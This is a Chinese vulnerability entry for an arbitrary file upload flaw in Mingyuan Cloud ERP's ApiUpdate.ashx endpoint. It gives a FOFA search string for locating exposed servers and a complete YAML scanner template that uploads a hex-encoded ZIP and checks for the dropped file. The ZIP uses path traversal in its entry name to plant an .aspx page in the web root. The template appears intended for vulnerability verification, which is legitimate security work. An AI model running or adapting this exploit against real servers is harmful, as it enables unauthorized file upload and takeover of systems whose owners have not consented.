漏洞描述
明源云 ERP系统接口管家 ApiUpdate.ashx 文件存在任意文件上传漏洞,攻击者通过构造特殊的ZIP压缩包可以上传任意文件,控制服务器
漏洞存在于某端口下的接口管家服务
FOFA: "接口管家站点正常!"
mingyuanyun-erp-apiupdate-fileupload: 明源云 ERP系统 接口管家 ApiUpdate.ashx 任意文件上传漏洞
PoC代码[已公开]
id: mingyuanyun-erp-apiupdate-fileupload
info:
name: 明源云 ERP系统 接口管家 ApiUpdate.ashx 任意文件上传漏洞
author: zan8in
severity: critical
verified: true
description: |-
明源云 ERP系统接口管家 ApiUpdate.ashx 文件存在任意文件上传漏洞,攻击者通过构造特殊的ZIP压缩包可以上传任意文件,控制服务器
漏洞存在于某端口下的接口管家服务
FOFA: "接口管家站点正常!"
tags: mingyuanyun,fileupload
created: 2023/09/05
set:
hexbody: hexdecode("504B030414000000080063740E576AE37B2383000000940000001D0000002E2E2F2E2E2F2E2E2F666463636C6F75642F5F2F746573742E6173707825CC490AC2401404D0BDA7685A02C9A62F90288A22041C42E2B0FE4A11033DD983E0EDFDE2AEA8575453AC444723C49EEC98392CE4662E45B16C185AE35D48E24806D1D3836DF8C404A3DAD37F227A066723D42D4C09A53C23A66BD65656F56ED2505B68703F20BC11D4817C47E959F678651EAA4BD06A7D8F4EE7841F5455CDB7B32F504B0102140314000000080063740E576AE37B2383000000940000001D00000000000000000000008001000000002E2E2F2E2E2F2E2E2F666463636C6F75642F5F2F746573742E61737078504B050600000000010001004B000000BE0000000000")
rules:
r0:
request:
method: POST
path: /myunke/ApiUpdateTool/ApiUpdate.ashx?apiocode=a
body: '{{hexbody}}'
expression: response.status == 200 && response.body.bcontains(b'{"Message":"OK"}')
r1:
request:
method: GET
path: /fdccloud/_/test.aspx
expression: response.status == 200 && response.body.bcontains(b'TestVuln')
expression: r0() && r1()